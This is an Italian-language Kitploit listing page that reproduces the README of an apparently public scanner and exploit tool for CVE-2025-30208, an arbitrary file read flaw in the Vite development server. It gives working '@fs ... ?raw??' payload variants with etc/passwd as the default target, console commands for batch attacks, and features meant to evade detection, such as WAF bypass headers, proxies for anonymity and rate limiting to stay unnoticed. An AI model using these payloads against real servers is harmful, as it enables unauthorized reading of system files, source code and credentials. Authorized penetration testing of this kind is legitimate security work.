Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 è una vulnerabilità di lettura arbitraria di file di gravità media nel server di sviluppo Vite (un popolare strumento di build per frontend) | Kitploit
Strumenti/GitHubGitHub/th-secforge/cve-2025-30208
RicognizioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubth-secforge/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 è una vulnerabilità di lettura arbitraria di file di gravità media nel server di sviluppo Vite (un popolare strumento di build per frontend)

Vedi Repository
1431 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔥 Scanner per vulnerabilità di lettura arbitraria di file CVE-2025-30208 per Vite

Python License Security Status Modular

Scanner avanzato per CVE-2025-30208 con funzionalità di livello enterprise

Strumento professionale di penetration testing per il rilevamento della vulnerabilità di lettura arbitraria di file in Vite

🚀 Avvio rapido • 📋 Caratteristiche • 🔧 Utilizzo • 📊 Esempi • 🛡️ Sicurezza


📖 Panoramica

Questo è uno scanner completo per vulnerabilità progettato per rilevare e sfruttare la CVE-2025-30208 nei server di sviluppo Vite. La vulnerabilità consente la lettura arbitraria di file attraverso gli endpoint del file system di Vite, esponendo potenzialmente file di configurazione sensibili, codice sorgente e informazioni di sistema.

🎯 Cosa fa questo strumento

  • Rileva istanze vulnerabili di Vite attraverso la rete
  • Sfrutta la vulnerabilità di lettura arbitraria di file in modo sicuro
  • Scopre file sensibili e dati di configurazione
  • Segnala risultati in diversi formati (HTML, JSON, Console)
  • Gestisce sessioni e configurazioni di scansione
  • Gestisce gli errori con meccanismi automatici di ripetizione

🏗️ Architettura modulare

Lo strumento ora presenta un'architettura modulare per una migliore manutenibilità ed estensibilità:

  • CVE-2025-30208.py - Applicazione principale dello scanner
  • payloads.py - Payload di sfruttamento avanzati (60+ varianti)
  • sensitive_files.py - Database completo di file sensibili (200+ file)
  • html_template.py - Template di reporting HTML migliorato in stile hacker

🚀 Avvio rapido

Prerequisiti

pip3 install -r requirements.txt

Utilizzo base

python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Caratteristiche

🔍 Rilevamento principale della vulnerabilità

  • 60+ Payload avanzati: Tecniche di sfruttamento complete per il massimo rilevamento
  • Rilevamento intelligente: Analisi intelligente delle risposte per evitare falsi positivi
  • Validazione in tempo reale: Validazione continua delle risposte del target
  • Test completi: Testa tutti gli endpoint vulnerabili noti

🛡️ Caratteristiche di sicurezza avanzate

  • Supporto proxy: Configurazione proxy HTTP/HTTPS per l'anonimato
  • Header personalizzati: Bypass WAF/IPS con header HTTP personalizzati
  • Limitazione della velocità: Ritardi configurabili per evitare il rilevamento
  • Gestione delle sessioni: Salva e ripristina sessioni di scansione
  • Validazione input: Validazione completa dei parametri

🔧 Capacità avanzate

  • Scansione batch: Scansione multi-thread di più target
  • Scoperta di file sensibili: Scoperta automatica di 200+ file sensibili
  • Test di connettività: Test dei protocolli TCP/UDP/HTTP/HTTPS
  • Recupero errori: Ripetizione automatica con backoff esponenziale
  • Logging completo: Log dettagliati con timestamp

📊 Reporting e output

  • 🎨 Report HTML migliorati: Bellissimi report di vulnerabilità in stile hacker con animazioni
  • Esportazione JSON: Dati strutturati per ulteriori analisi
  • Output su console: Feedback in tempo reale con colori
  • File di log: Audit trail dettagliati
  • Interfaccia web interattiva: Server web integrato per visualizzare i report

🔧 Guida all'utilizzo

1. Configurazione base

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Test della vulnerabilità

CVE-2025-30208 > run

# Abilita la modalità verbose per output dettagliato
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Scansione batch

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Premi Invio due volte per terminare]

4. Scoperta di file sensibili

CVE-2025-30208 > scan

5. Configurazione avanzata

# Configura proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Imposta header personalizzati
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configura limitazione della velocità
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Reporting HTML migliorato

# Genera un bellissimo report HTML
CVE-2025-30208 > pull

# Avvia il server web per visualizzare il report
CVE-2025-30208 > web

# Avvia il server web su una porta specifica
CVE-2025-30208 > web 8081

# Ferma il server web
CVE-2025-30208 > web off

📊 Riferimento comandi

ComandoDescrizioneEsempio
set <opzione> <valore>Imposta opzioni di configurazioneset RHOST 192.168.1.100
show optionsMostra le impostazioni correntishow options
editEditor interattivo delle opzioniedit
run / exploitEsegui test di vulnerabilitàrun
batchScansione batch di più targetbatch
scanScopri file sensibiliscan
pullEsporta risultati in HTML/JSONpull
web [on|off|porta]Server web per report HTMLweb 8080
saveSalva configurazione della sessionesave
loadCarica configurazione della sessioneload
testTesta la connettività al targettest
validateValida la configurazione correntevalidate
verboseAttiva/disattiva modalità verboseverbose
proxyConfigura impostazioni proxyproxy
headersImposta header HTTP personalizzatiheaders
rateConfigura limitazione della velocitàrate
logMostra informazioni di loglog
help / ?Mostra aiutohelp
exit / quitEsci dallo strumentoexit

⚙️ Opzioni di configurazione

OpzioneDescrizionePredefinitoValidazione
RHOSTIndirizzo host/IP del target-Validazione hostname/IP
RPORTNumero porta del target-Intervallo porte (1-65535)
FILEPATHPercorso file da testareetc/passwdValidazione percorso
PROXYURL proxy HTTP/HTTPS-Validazione formato URL
VERBOSEAbilita output verbosefalseValidazione booleana
RATE_LIMITRitardo tra le richieste (secondi)0.3Validazione numerica
THREADSNumero di thread per scansione batch5Validazione intera
TIMEOUTTimeout richiesta (secondi)5Validazione intera
CUSTOM_HEADERSHeader HTTP personalizzati (JSON){}Validazione formato JSON

🎨 Sistema di payload migliorato

Lo scanner ora utilizza 60+ diverse varianti di payload organizzate in payloads.py:

Payload @fs primari

/@fs/{percorso_file}?raw??
/@fs/{percorso_file}?raw&url
/@fs/{percorso_file}?import&raw??
/@fs/{percorso_file}?raw&import
/@fs/{percorso_file}?import&url

Variazioni di parametri estese

/@fs/{percorso_file}?raw&source
/@fs/{percorso_file}?raw&content
/@fs/{percorso_file}?raw&data
/@fs/{percorso_file}?raw&file
/@fs/{percorso_file}?raw&type=text
/@fs/{percorso_file}?raw&format=text
/@fs/{percorso_file}?raw&encoding=utf8

Variazioni specifiche di Vite

/@fs/{percorso_file}?raw&vite&dev
/@fs/{percorso_file}?raw&vite&hot
/@fs/{percorso_file}?raw&vite&hmr
/@fs/{percorso_file}?raw&development
/@fs/{percorso_file}?raw&debug
Scarica lo strumento